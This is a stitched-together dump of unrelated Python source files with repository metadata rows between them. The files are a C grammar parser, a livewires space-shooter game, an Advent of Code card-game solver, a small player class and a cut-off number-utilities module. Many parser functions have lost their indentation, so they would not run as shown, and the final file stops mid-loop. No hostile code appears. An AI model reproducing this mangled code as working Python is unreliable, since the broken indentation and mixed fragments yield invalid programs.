        # and incorrectly interpreted as TYPEID.  We need to add the
        # parameters to the scope the moment the lexer sees LBRACE.
        #
        if self._get_yacc_lookahead_token().type == "LBRACE":
            if func.args is not None:
                for param in func.args.params:
                    # Variadic '...' has no name to register.
                    if isinstance(param, c_ast.EllipsisParam): break
                    self._add_identifier(param.name, param.coord)
        p[0] = self._type_modify_decl(decl=p[1], modifier=func)
def p_pointer(self, p):
""" pointer : TIMES type_qualifier_list_opt
| TIMES type_qualifier_list_opt pointer
"""
coord = self._token_coord(p, 1)
# Pointer decls nest from inside out. This is important when different
# levels have different qualifiers. For example:
#
# char * const * p;
#
# Means "pointer to const pointer to char"
#
# While:
#
# char ** const p;
#
# Means "const pointer to pointer to char"
#
# So when we construct PtrDecl nestings, the leftmost pointer goes in
# as the most nested type.
nested_type = c_ast.PtrDecl(quals=p[2] or [], type=None, coord=coord)
if len(p) > 3:
tail_type = p[3]
while tail_type.type is not None:
tail_type = tail_type.type
tail_type.type = nested_type
p[0] = p[3]
else:
p[0] = nested_type
def p_type_qualifier_list(self, p):
""" type_qualifier_list : type_qualifier
| type_qualifier_list type_qualifier
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
    def p_parameter_type_list(self, p):
        """ parameter_type_list : parameter_list
                                | parameter_list COMMA ELLIPSIS
        """
        # A trailing '...' is appended to the ParamList as EllipsisParam.
        if len(p) > 2:
            p[1].params.append(c_ast.EllipsisParam(self._token_coord(p, 3)))
        p[0] = p[1]
    def p_parameter_list(self, p):
        """ parameter_list  : parameter_declaration
                            | parameter_list COMMA parameter_declaration
        """
        if len(p) == 2: # single parameter
            p[0] = c_ast.ParamList([p[1]], p[1].coord)
        else:
            # Append to the existing ParamList node.
            p[1].params.append(p[3])
            p[0] = p[1]
# From ISO/IEC 9899:TC2, 6.7.5.3.11:
# "If, in a parameter declaration, an identifier can be treated either
# as a typedef name or as a parameter name, it shall be taken as a
# typedef name."
#
# Inside a parameter declaration, once we've reduced declaration specifiers,
# if we shift in an LPAREN and see a TYPEID, it could be either an abstract
# declarator or a declarator nested inside parens. This rule tells us to
# always treat it as an abstract declarator. Therefore, we only accept
# `id_declarator`s and `typeid_noparen_declarator`s.
    def p_parameter_declaration_1(self, p):
        """ parameter_declaration   : declaration_specifiers id_declarator
                                    | declaration_specifiers typeid_noparen_declarator
        """
        spec = p[1]
        if not spec['type']:
            # No explicit type - default to implicit 'int'.
            spec['type'] = [c_ast.IdentifierType(['int'],
                coord=self._token_coord(p, 1))]
        p[0] = self._build_declarations(
            spec=spec,
            decls=[dict(decl=p[2])])[0]
    def p_parameter_declaration_2(self, p):
        """ parameter_declaration   : declaration_specifiers abstract_declarator_opt
        """
        spec = p[1]
        if not spec['type']:
            # No explicit type - default to implicit 'int'.
            spec['type'] = [c_ast.IdentifierType(['int'],
                coord=self._token_coord(p, 1))]
        # Parameters can have the same names as typedefs.  The trouble is that
        # the parameter's name gets grouped into declaration_specifiers, making
        # it look like an old-style declaration; compensate.
        #
        if len(spec['type']) > 1 and len(spec['type'][-1].names) == 1 and \
                self._is_type_in_scope(spec['type'][-1].names[0]):
            decl = self._build_declarations(
                    spec=spec,
                    decls=[dict(decl=p[2], init=None)])[0]
        # This truly is an old-style parameter declaration
        #
        else:
            # Abstract (unnamed) parameter: wrap in a Typename node.
            decl = c_ast.Typename(
                name='',
                quals=spec['qual'],
                type=p[2] or c_ast.TypeDecl(None, None, None),
                coord=self._token_coord(p, 2))
            typename = spec['type']
            decl = self._fix_decl_name_type(decl, typename)
        p[0] = decl
    def p_identifier_list(self, p):
        """ identifier_list : identifier
                            | identifier_list COMMA identifier
        """
        # K&R-style parameter name list, e.g. 'int foo(a, b)'.
        if len(p) == 2: # single parameter
            p[0] = c_ast.ParamList([p[1]], p[1].coord)
        else:
            p[1].params.append(p[3])
            p[0] = p[1]
    def p_initializer_1(self, p):
        """ initializer : assignment_expression
        """
        # A scalar initializer is just the expression itself.
        p[0] = p[1]
def p_initializer_2(self, p):
""" initializer : brace_open initializer_list_opt brace_close
| brace_open initializer_list COMMA brace_close
"""
if p[2] is None:
p[0] = c_ast.InitList([], self._token_coord(p, 1))
else:
p[0] = p[2]
    def p_initializer_list(self, p):
        """ initializer_list    : designation_opt initializer
                                | initializer_list COMMA designation_opt initializer
        """
        if len(p) == 3: # single initializer
            # A preceding designation ('.x =' / '[i] =') wraps the
            # initializer in a NamedInitializer.
            init = p[2] if p[1] is None else c_ast.NamedInitializer(p[1], p[2])
            p[0] = c_ast.InitList([init], p[2].coord)
        else:
            init = p[4] if p[3] is None else c_ast.NamedInitializer(p[3], p[4])
            p[1].exprs.append(init)
            p[0] = p[1]
    def p_designation(self, p):
        """ designation : designator_list EQUALS
        """
        # Only the designator list matters; the '=' is syntax.
        p[0] = p[1]
# Designators are represented as a list of nodes, in the order in which
# they're written in the code.
#
def p_designator_list(self, p):
""" designator_list : designator
| designator_list designator
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
    def p_designator(self, p):
        """ designator  : LBRACKET constant_expression RBRACKET
                        | PERIOD identifier
        """
        # Either the index expression or the member identifier - p[2] in
        # both productions.
        p[0] = p[2]
    def p_type_name(self, p):
        """ type_name   : specifier_qualifier_list abstract_declarator_opt
        """
        # Type names (as in casts and sizeof) are Typename nodes; with no
        # abstract declarator an empty TypeDecl acts as the placeholder.
        typename = c_ast.Typename(
            name='',
            quals=p[1]['qual'],
            type=p[2] or c_ast.TypeDecl(None, None, None),
            coord=self._token_coord(p, 2))
        p[0] = self._fix_decl_name_type(typename, p[1]['type'])
    def p_abstract_declarator_1(self, p):
        """ abstract_declarator     : pointer
        """
        # Pointer with nothing to point at yet - hang it on a dummy TypeDecl.
        dummytype = c_ast.TypeDecl(None, None, None)
        p[0] = self._type_modify_decl(
            decl=dummytype,
            modifier=p[1])
    def p_abstract_declarator_2(self, p):
        """ abstract_declarator     : pointer direct_abstract_declarator
        """
        # Apply the pointer modifier chain to the direct declarator.
        p[0] = self._type_modify_decl(p[2], p[1])
    def p_abstract_declarator_3(self, p):
        """ abstract_declarator     : direct_abstract_declarator
        """
        # Pure dispatch - forward the direct abstract declarator.
        p[0] = p[1]
# Creating and using direct_abstract_declarator_opt here
# instead of listing both direct_abstract_declarator and the
# lack of it in the beginning of _1 and _2 caused two
# shift/reduce errors.
#
    def p_direct_abstract_declarator_1(self, p):
        """ direct_abstract_declarator  : LPAREN abstract_declarator RPAREN """
        # Parenthesized grouping - no new node.
        p[0] = p[2]
    def p_direct_abstract_declarator_2(self, p):
        """ direct_abstract_declarator  : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET
        """
        # Array modifier on an existing abstract declarator.
        arr = c_ast.ArrayDecl(
            type=None,
            dim=p[3],
            dim_quals=[],
            coord=p[1].coord)
        p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
    def p_direct_abstract_declarator_3(self, p):
        """ direct_abstract_declarator  : LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET
        """
        # Array with no preceding declarator: base is an empty TypeDecl.
        quals = (p[2] if len(p) > 4 else []) or []
        p[0] = c_ast.ArrayDecl(
            type=c_ast.TypeDecl(None, None, None),
            dim=p[3] if len(p) > 4 else p[2],
            dim_quals=quals,
            coord=self._token_coord(p, 1))
    def p_direct_abstract_declarator_4(self, p):
        """ direct_abstract_declarator  : direct_abstract_declarator LBRACKET TIMES RBRACKET
        """
        # VLA of unspecified size ('[*]'): the TIMES token (p[3]) is kept as
        # the dimension, represented as an ID node named '*'.
        arr = c_ast.ArrayDecl(
            type=None,
            dim=c_ast.ID(p[3], self._token_coord(p, 3)),
            dim_quals=[],
            coord=p[1].coord)
        p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_abstract_declarator_5(self, p):
""" direct_abstract_declarator : LBRACKET TIMES RBRACKET
"""
p[0] = c_ast.ArrayDecl(
type=c_ast.TypeDecl(None, None, None),
dim=c_ast.ID(p[3], self._token_coord(p, 3)),
dim_quals=[],
coord=self._token_coord(p, 1))
    def p_direct_abstract_declarator_6(self, p):
        """ direct_abstract_declarator  : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN
        """
        # Function modifier on an existing abstract declarator.
        func = c_ast.FuncDecl(
            args=p[3],
            type=None,
            coord=p[1].coord)
        p[0] = self._type_modify_decl(decl=p[1], modifier=func)
    def p_direct_abstract_declarator_7(self, p):
        """ direct_abstract_declarator  : LPAREN parameter_type_list_opt RPAREN
        """
        # Function type with no preceding declarator: base is an empty
        # TypeDecl.
        p[0] = c_ast.FuncDecl(
            args=p[2],
            type=c_ast.TypeDecl(None, None, None),
            coord=self._token_coord(p, 1))
# declaration is a list, statement isn't. To make it consistent, block_item
# will always be a list
#
def p_block_item(self, p):
""" block_item : declaration
| statement
"""
p[0] = p[1] if isinstance(p[1], list) else [p[1]]
# Since we made block_item a list, this just combines lists
#
def p_block_item_list(self, p):
""" block_item_list : block_item
| block_item_list block_item
"""
# Empty block items (plain ';') produce [None], so ignore them
p[0] = p[1] if (len(p) == 2 or p[2] == [None]) else p[1] + p[2]
    def p_compound_statement_1(self, p):
        """ compound_statement : brace_open block_item_list_opt brace_close """
        # block_items is None for an empty '{}' body.
        p[0] = c_ast.Compound(
            block_items=p[2],
            coord=self._token_coord(p, 1))
    def p_labeled_statement_1(self, p):
        """ labeled_statement : ID COLON pragmacomp_or_statement """
        # 'name: stmt' goto label.
        p[0] = c_ast.Label(p[1], p[3], self._token_coord(p, 1))
    def p_labeled_statement_2(self, p):
        """ labeled_statement : CASE constant_expression COLON pragmacomp_or_statement """
        # The statement list is filled in/regrouped later by fix_switch_cases.
        p[0] = c_ast.Case(p[2], [p[4]], self._token_coord(p, 1))
    def p_labeled_statement_3(self, p):
        """ labeled_statement : DEFAULT COLON pragmacomp_or_statement """
        # The statement list is filled in/regrouped later by fix_switch_cases.
        p[0] = c_ast.Default([p[3]], self._token_coord(p, 1))
    def p_selection_statement_1(self, p):
        """ selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement """
        # 'if' without 'else': iffalse is None.
        p[0] = c_ast.If(p[3], p[5], None, self._token_coord(p, 1))
    def p_selection_statement_2(self, p):
        """ selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement """
        # 'if'/'else': p[5] is the true branch, p[7] the false branch.
        p[0] = c_ast.If(p[3], p[5], p[7], self._token_coord(p, 1))
    def p_selection_statement_3(self, p):
        """ selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement """
        # fix_switch_cases regroups the flat body into Case/Default nodes.
        p[0] = fix_switch_cases(
                c_ast.Switch(p[3], p[5], self._token_coord(p, 1)))
    def p_iteration_statement_1(self, p):
        """ iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement """
        # while (cond) stmt
        p[0] = c_ast.While(p[3], p[5], self._token_coord(p, 1))
    def p_iteration_statement_2(self, p):
        """ iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI """
        # do stmt while (cond); - note cond (p[5]) precedes stmt (p[2]) in
        # the DoWhile constructor.
        p[0] = c_ast.DoWhile(p[5], p[2], self._token_coord(p, 1))
    def p_iteration_statement_3(self, p):
        """ iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement """
        # for (init; cond; next) stmt - each clause may be None.
        p[0] = c_ast.For(p[3], p[5], p[7], p[9], self._token_coord(p, 1))
    def p_iteration_statement_4(self, p):
        """ iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt SEMI RPAREN pragmacomp_or_statement """
        # C99 for-loop with a declaration as the init clause; the Decl list
        # is wrapped in a DeclList node.
        p[0] = c_ast.For(c_ast.DeclList(p[3], self._token_coord(p, 1)),
                         p[4], p[6], p[8], self._token_coord(p, 1))
    def p_jump_statement_1(self, p):
        """ jump_statement  : GOTO ID SEMI """
        # goto label;
        p[0] = c_ast.Goto(p[2], self._token_coord(p, 1))
    def p_jump_statement_2(self, p):
        """ jump_statement  : BREAK SEMI """
        # break;
        p[0] = c_ast.Break(self._token_coord(p, 1))
    def p_jump_statement_3(self, p):
        """ jump_statement  : CONTINUE SEMI """
        # continue;
        p[0] = c_ast.Continue(self._token_coord(p, 1))
    def p_jump_statement_4(self, p):
        """ jump_statement  : RETURN expression SEMI
                            | RETURN SEMI
        """
        # 'return;' yields a Return node with expr=None.
        p[0] = c_ast.Return(p[2] if len(p) == 4 else None, self._token_coord(p, 1))
def p_expression_statement(self, p):
""" expression_statement : expression_opt SEMI """
if p[1] is None:
p[0] = c_ast.EmptyStatement(self._token_coord(p, 2))
else:
p[0] = p[1]
    def p_expression(self, p):
        """ expression  : assignment_expression
                        | expression COMMA assignment_expression
        """
        if len(p) == 2:
            p[0] = p[1]
        else:
            # Comma operator: collect operands into a single ExprList,
            # promoting the first operand lazily on the second comma.
            if not isinstance(p[1], c_ast.ExprList):
                p[1] = c_ast.ExprList([p[1]], p[1].coord)
            p[1].exprs.append(p[3])
            p[0] = p[1]
    def p_typedef_name(self, p):
        """ typedef_name : TYPEID """
        # A typedef'd name used as a type is a one-name IdentifierType.
        p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1))
    def p_assignment_expression(self, p):
        """ assignment_expression   : conditional_expression
                                    | unary_expression assignment_operator assignment_expression
        """
        if len(p) == 2:
            p[0] = p[1]
        else:
            # p[2] is the operator string ('=', '+=', ...); lvalue p[1],
            # rvalue p[3].
            p[0] = c_ast.Assignment(p[2], p[1], p[3], p[1].coord)
# K&R2 defines these as many separate rules, to encode
# precedence and associativity. Why work hard ? I'll just use
# the built in precedence/associativity specification feature
# of PLY. (see precedence declaration above)
#
    def p_assignment_operator(self, p):
        """ assignment_operator : EQUALS
                                | XOREQUAL
                                | TIMESEQUAL
                                | DIVEQUAL
                                | MODEQUAL
                                | PLUSEQUAL
                                | MINUSEQUAL
                                | LSHIFTEQUAL
                                | RSHIFTEQUAL
                                | ANDEQUAL
                                | OREQUAL
        """
        # Keep the raw operator string.
        p[0] = p[1]
def p_constant_expression(self, p):
""" constant_expression : conditional_expression """
p[0] = p[1]
def p_conditional_expression(self, p):
""" conditional_expression : binary_expression
| binary_expression CONDOP expression COLON conditional_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.TernaryOp(p[1], p[3], p[5], p[1].coord)
def p_binary_expression(self, p):
""" binary_expression : cast_expression
| binary_expression TIMES binary_expression
| binary_expression DIVIDE binary_expression
| binary_expression MOD binary_expression
| binary_expression PLUS binary_expression
| binary_expression MINUS binary_expression
| binary_expression RSHIFT binary_expression
| binary_expression LSHIFT binary_expression
| binary_expression LT binary_expression
| binary_expression LE binary_expression
| binary_expression GE binary_expression
| binary_expression GT binary_expression
| binary_expression EQ binary_expression
| binary_expression NE binary_expression
| binary_expression AND binary_expression
| binary_expression OR binary_expression
| binary_expression XOR binary_expression
| binary_expression LAND binary_expression
| binary_expression LOR binary_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.BinaryOp(p[2], p[1], p[3], p[1].coord)
def p_cast_expression_1(self, p):
""" cast_expression : unary_expression """
p[0] = p[1]
def p_cast_expression_2(self, p):
""" cast_expression : LPAREN type_name RPAREN cast_expression """
p[0] = c_ast.Cast(p[2], p[4], self._token_coord(p, 1))
def p_unary_expression_1(self, p):
""" unary_expression : postfix_expression """
p[0] = p[1]
def p_unary_expression_2(self, p):
""" unary_expression : PLUSPLUS unary_expression
| MINUSMINUS unary_expression
| unary_operator cast_expression
"""
p[0] = c_ast.UnaryOp(p[1], p[2], p[2].coord)
def p_unary_expression_3(self, p):
""" unary_expression : SIZEOF unary_expression
| SIZEOF LPAREN type_name RPAREN
"""
p[0] = c_ast.UnaryOp(
p[1],
p[2] if len(p) == 3 else p[3],
self._token_coord(p, 1))
def p_unary_operator(self, p):
""" unary_operator : AND
| TIMES
| PLUS
| MINUS
| NOT
| LNOT
"""
p[0] = p[1]
def p_postfix_expression_1(self, p):
""" postfix_expression : primary_expression """
p[0] = p[1]
def p_postfix_expression_2(self, p):
""" postfix_expression : postfix_expression LBRACKET expression RBRACKET """
p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord)
def p_postfix_expression_3(self, p):
""" postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN
| postfix_expression LPAREN RPAREN
"""
p[0] = c_ast.FuncCall(p[1], p[3] if len(p) == 5 else None, p[1].coord)
def p_postfix_expression_4(self, p):
""" postfix_expression : postfix_expression PERIOD ID
| postfix_expression PERIOD TYPEID
| postfix_expression ARROW ID
| postfix_expression ARROW TYPEID
"""
field = c_ast.ID(p[3], self._token_coord(p, 3))
p[0] = c_ast.StructRef(p[1], p[2], field, p[1].coord)
def p_postfix_expression_5(self, p):
""" postfix_expression : postfix_expression PLUSPLUS
| postfix_expression MINUSMINUS
"""
p[0] = c_ast.UnaryOp('p' + p[2], p[1], p[1].coord)
def p_postfix_expression_6(self, p):
""" postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close
| LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close
"""
p[0] = c_ast.CompoundLiteral(p[2], p[5])
def p_primary_expression_1(self, p):
""" primary_expression : identifier """
p[0] = p[1]
def p_primary_expression_2(self, p):
""" primary_expression : constant """
p[0] = p[1]
def p_primary_expression_3(self, p):
""" primary_expression : unified_string_literal
| unified_wstring_literal
"""
p[0] = p[1]
def p_primary_expression_4(self, p):
""" primary_expression : LPAREN expression RPAREN """
p[0] = p[2]
def p_primary_expression_5(self, p):
""" primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN
"""
coord = self._token_coord(p, 1)
p[0] = c_ast.FuncCall(c_ast.ID(p[1], coord),
c_ast.ExprList([p[3], p[5]], coord),
coord)
def p_offsetof_member_designator(self, p):
""" offsetof_member_designator : identifier
| offsetof_member_designator PERIOD identifier
| offsetof_member_designator LBRACKET expression RBRACKET
"""
if len(p) == 2:
p[0] = p[1]
elif len(p) == 4:
p[0] = c_ast.StructRef(p[1], p[2], p[3], p[1].coord)
elif len(p) == 5:
p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord)
else:
raise NotImplementedError("Unexpected parsing state. len(p): %u" % len(p))
def p_argument_expression_list(self, p):
""" argument_expression_list : assignment_expression
| argument_expression_list COMMA assignment_expression
"""
if len(p) == 2: # single expr
p[0] = c_ast.ExprList([p[1]], p[1].coord)
else:
p[1].exprs.append(p[3])
p[0] = p[1]
def p_identifier(self, p):
""" identifier : ID """
p[0] = c_ast.ID(p[1], self._token_coord(p, 1))
def p_constant_1(self, p):
""" constant : INT_CONST_DEC
| INT_CONST_OCT
| INT_CONST_HEX
| INT_CONST_BIN
| INT_CONST_CHAR
"""
uCount = 0
lCount = 0
for x in p[1][-3:]:
if x in ('l', 'L'):
lCount += 1
elif x in ('u', 'U'):
uCount += 1
t = ''
if uCount > 1:
raise ValueError('Constant cannot have more than one u/U suffix.')
elif lCount > 2:
raise ValueError('Constant cannot have more than two l/L suffix.')
prefix = 'unsigned ' * uCount + 'long ' * lCount
p[0] = c_ast.Constant(
prefix + 'int', p[1], self._token_coord(p, 1))
def p_constant_2(self, p):
""" constant : FLOAT_CONST
| HEX_FLOAT_CONST
"""
if 'x' in p[1].lower():
t = 'float'
else:
if p[1][-1] in ('f', 'F'):
t = 'float'
elif p[1][-1] in ('l', 'L'):
t = 'long double'
else:
t = 'double'
p[0] = c_ast.Constant(
t, p[1], self._token_coord(p, 1))
def p_constant_3(self, p):
""" constant : CHAR_CONST
| WCHAR_CONST
"""
p[0] = c_ast.Constant(
'char', p[1], self._token_coord(p, 1))
# The "unified" string and wstring literal rules are for supporting
# concatenation of adjacent string literals.
# I.e. "hello " "world" is seen by the C compiler as a single string literal
# with the value "hello world"
#
def p_unified_string_literal(self, p):
""" unified_string_literal : STRING_LITERAL
| unified_string_literal STRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._token_coord(p, 1))
else:
p[1].value = p[1].value[:-1] + p[2][1:]
p[0] = p[1]
def p_unified_wstring_literal(self, p):
""" unified_wstring_literal : WSTRING_LITERAL
| unified_wstring_literal WSTRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._token_coord(p, 1))
else:
p[1].value = p[1].value.rstrip()[:-1] + p[2][2:]
p[0] = p[1]
def p_comment_cond_statement(self, p):
""" comment_cond_statement : COMMENTCOND COMMENTSTR
| COMMENTACTION COMMENTSTR
"""
p[0] = c_ast.CommentCond(p[1], p[2])
def p_brace_open(self, p):
""" brace_open : LBRACE
"""
p[0] = p[1]
p.set_lineno(0, p.lineno(1))
def p_brace_close(self, p):
""" brace_close : RBRACE
"""
p[0] = p[1]
p.set_lineno(0, p.lineno(1))
def p_empty(self, p):
'empty : '
p[0] = None
def p_error(self, p):
# If error recovery is added here in the future, make sure
# _get_yacc_lookahead_token still works!
#
if p:
self._parse_error(
'before: %s' % p.value,
self._coord(lineno=p.lineno,
column=self.clex.find_tok_column(p)))
else:
self._parse_error('At end of input', self.clex.filename)
| [
"ligongming168@163.com"
] | ligongming168@163.com |
e6d2b5fe6f232ae369c8e0bf48ffeefacedd70f2 | b7b3ca7e4793aaa4972b6fcb76cbf0d39344b88b | /__init__.py | 327c37073bdebe7f3e90160a77b3104c62154fce | [] | no_license | parenthetical-e/similarity | b45b68c7bb2805535526e628c865af0f081f4d22 | 83a679b61aa12aa770897f8f840584724c964da7 | refs/heads/master | 2016-09-11T04:02:45.395812 | 2012-06-21T18:33:28 | 2012-06-21T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | import category
import distance
| [
"Erik.Exists@gmail.com"
] | Erik.Exists@gmail.com |
e2692712f8fd275f7110d82131ecccfd6a3d0580 | aba4d16d8ec734eb8838e150d425f6c9d8e146bc | /game.py | b460e31979089a2782bd696568c2b33dc9422aee | [] | no_license | 666stephunter/game | b0682f02ab72e757389b00a31cd0cf0799cf220f | 89f7c962bf6d312786f0920662d6d58327d3a968 | refs/heads/master | 2020-05-24T15:31:57.512296 | 2019-05-18T08:33:51 | 2019-05-18T08:33:51 | 187,333,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,007 | py | from livewires import games, color
import random
games.init(screen_width=840, screen_height=480, fps=50)
class Hero(games.Sprite):
image = games.load_image('img/ship.png')
MISSILE_DELAY = 40
def __init__(self, x = 30, y=240):
super(Hero, self).__init__(image=Hero.image,
x=x,y=y
)
self.missile_wait = 0
def update(self):
if games.keyboard.is_pressed(games.K_DOWN):
self.y += 4
if games.keyboard.is_pressed(games.K_UP):
self.y -= 4
if self.missile_wait > 0:
self.missile_wait -= 1
if games.keyboard.is_pressed(games.K_SPACE) and self.missile_wait==0:
new_missile = Missile(self.x, self.y)
games.screen.add(new_missile)
self.missile_wait = Hero.MISSILE_DELAY
class Rocket(games.Sprite):
image = games.load_image('img/flash.png')
speed = -3
def __init__(self, y,x=820):
super(Rocket, self).__init__(image=Rocket.image,
x=x,
y=y,
dx=Rocket.speed)
def smert(self):
self.destroy()
def update(self):
for _ in self.overlapping_sprites:
if not games.keyboard.is_pressed(games.K_SPACE):
for sprite in self.overlapping_sprites:
sprite.destroy()
self.destroy()
def update(self):
if self.left < 0:
self.end_game()
def end_game(self):
end_msg = games.Message(value='Вы проиграли!',
size=90,
color=color.red,
x=games.screen.width / 2,
y=games.screen.height / 2,
lifetime=5 * games.screen.fps,
after_death=games.screen.quit
)
games.screen.add(end_msg)
class Evil(games.Sprite):
image = games.load_image('img/monster.png')
def __init__(self, speed=2, odds_change=200):
super(Evil, self).__init__(image=Evil.image,
x=810,
y=games.screen.height / 2,
dy=speed)
self.odds_change = odds_change
self.time_til_drop = 0
def update(self):
if self.bottom > 480 or self.top < 0:
self.dy = -self.dy
elif random.randrange(self.odds_change) == 0:
self.dy = -self.dy
self.check_drop()
def check_drop(self):
if self.time_til_drop > 0:
self.time_til_drop -= 1
else:
new_rocket = Rocket(y=self.y, x = 750)
games.screen.add(new_rocket)
self.time_til_drop = random.randint(30, 100)
class Missile(games.Sprite):
image = games.load_image('img/fireworks.png')
VELOCITY_FACTOR = 30
LIFETIME = 20
def __init__(self,hero_x,hero_y):
x = hero_x
y = hero_y
dx = Missile.VELOCITY_FACTOR
super(Missile, self).__init__(image=Missile.image,
x=x+100,
y=y,
dx=dx,
)
self.lifetime = Missile.LIFETIME
self.score = games.Text(value=0,
size=30,
right=games.screen.width - 10,
color=color.yellow,
top=5
)
games.screen.add(self.score)
def boom(self):
for rocket in self.overlapping_sprites:
rocket.handle_caught()
self.score.value += 1
def handle_caught(self):
self.destroy()
def smert(self):
pass
def update(self):
if self.overlapping_sprites:
for sprite in self.overlapping_sprites:
sprite.smert()
self.destroy()
self.lifetime -= 1
if self.lifetime == 0:
self.destroy()
#self.boom()
class Game:
def __init__(self):
self.the_hero = Hero()
games.screen.add(self.the_hero)
def start(self):
wall_image = games.load_image('img/space.jpg', transparent=False)
games.screen.background = wall_image
games.music.load('music/theme.wav')
games.music.play()
def main():
start = Game()
start.start()
the_hero = Hero()
games.screen.add(the_hero)
the_evil = Evil()
games.screen.add(the_evil)
games.screen.mainloop()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | 666stephunter.noreply@github.com |
68e0d384def2d5d2eabef9e1b1dde67527ab8fbf | 859324ecd7373b398461f005684a32985cb8dcb1 | /2020/22-python/combat.py | 3e149a10d58d601d1aa92db7709c879227a8f4a1 | [] | no_license | gucce/advent-of-code | 14c687375b5b38ca1f625e45535eec13a1334815 | 491ea7d2f51d39d6c440d7df7c0d13cc390eb764 | refs/heads/master | 2021-06-09T22:45:56.857066 | 2020-12-22T15:47:38 | 2020-12-22T15:47:38 | 158,203,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | from typing import List
def read_file(file_path):
with open(file_path, 'r', encoding="UTF-8") as f:
return f.read().strip()
class Combat:
def __init__(self, input_data: str):
p1, p2 = input_data.strip().split('\n\n')
self.player_one = self.parse_player(p1)
self.player_two = self.parse_player(p2)
def play(self) -> bool:
if not (self.player_one and self.player_two):
return False
card1 = self.player_one.pop()
card2 = self.player_two.pop()
if card1 >= card2:
self.player_one.insert(0, card1)
self.player_one.insert(0, card2)
else:
self.player_two.insert(0, card2)
self.player_two.insert(0, card1)
return True
@staticmethod
def calc_score(cards: List[int]):
score = 0
for idx, c in enumerate(cards):
score += (idx + 1) * c
return score
def part1(self) -> int:
while self.play():
pass
return self.calc_score(self.player_one) if self.player_one else self.calc_score(self.player_two)
def part2(self) -> int:
return 1
def parse_player(self, cards: str) -> List[int]:
return list(reversed([int(c) for c in cards.splitlines()[1:]]))
def main():
c1 = Combat(read_file('input'))
c2 = Combat(read_file('input'))
print('Part 1: ', c1.part1())
print('Part 2: ', c2.part2())
if __name__ == '__main__':
main()
| [
"Christian.Guggenmos@bmw.de"
] | Christian.Guggenmos@bmw.de |
a13d8c61c6413969c2c13d8696d02ad6603481c6 | d54869631b5ce16bc5f54b944ccda20ba22eface | /drawplayer.py | 7dd506e0de2fad5b21dbf079bc56da9b13173dd8 | [] | no_license | manasreldin/monte-carlo-tree-search | 0b7d1c462d58bf5834aed33df8f131ff05693ba9 | 95edca506ae99895fcfbbd6d47448ff4bd4b4055 | refs/heads/master | 2022-07-03T07:22:28.446953 | 2020-05-10T18:41:20 | 2020-05-10T18:41:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | class DrawPlayer:
def __init__(self, name: str):
self.name = name
def __repr__(self):
return f'Player {self.name}'
def __hash__(self):
return hash(self.name)
OnlyDrawPlayer = DrawPlayer('Draw')
| [
"shehabyasser@gmail.com"
] | shehabyasser@gmail.com |
b31b6630d2fe8dafff1586f89d1536aafde60a02 | 5ec5a9666864ce4b548dbb43a2fcf86a11f6dc90 | /22/Utils.py | a88399cac107ca55d72f432f5ae4e874b3afc89b | [
"MIT"
] | permissive | bobismijnnaam/bobe-euler | 24f32341d01b3bc11bb8de778d8ad5369b1bb81e | 111abdf37256d19c4a8c4e1a071db52929acf9d9 | refs/heads/master | 2021-01-10T19:59:35.559134 | 2017-11-15T09:25:52 | 2017-11-15T09:25:52 | 24,141,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,538 | py | import collections
class BigInt:
def __init__(self):
self.number = [0]
def skim(self):
carrier = 0
for i in range(0, len(self.number)):
self.number[i] += carrier
head = self.number[i] % 10
carrier = (self.number[i] - head) / 10
self.number[i] = int(head)
while carrier != 0:
head = carrier % 10
carrier = (carrier - head) / 10
self.number.append(int(head))
def add(self, factor):
self.number[0] += factor
self.skim();
def mul(self, factor):
for i in range(0, len(self.number)):
self.number[i] *= factor
self.skim()
def getNumberArray(self):
return list(self.number)
def toString(self):
result = ""
for i in self.number:
result += str(i)
return result
class NumberJuggler:
def __init__(self):
with open("primes.txt") as f:
content = f.readlines()
primes = []
for line in content:
primes.append(int(line))
self.primes = primes
def getFactorization(self, num):
factorisation = collections.defaultdict(int)
countdown = num
for prime in self.primes:
if countdown == 1: break
while countdown % prime == 0:
countdown = countdown // prime
factorisation[prime] += 1
return factorisation
def getPrimeFactors(self, num):
return list(getFactorization(num).keys())
def getDivisors(self, num):
if num == 1: return [1]
factorization = self.getFactorization(num)
factors = list(factorization.keys())
factorCounts = [0] * len(factors)
factorCounts[0] = 1
run = True
divisors = [1]
while run:
divisor = 1;
for j in range(0, len(factors)):
if factorCounts[j] != 0:
divisor *= factors[j]**factorCounts[j]
if divisor != num:
divisors.append(divisor)
factorCounts[0] += 1
for j in range(0, len(factorCounts)):
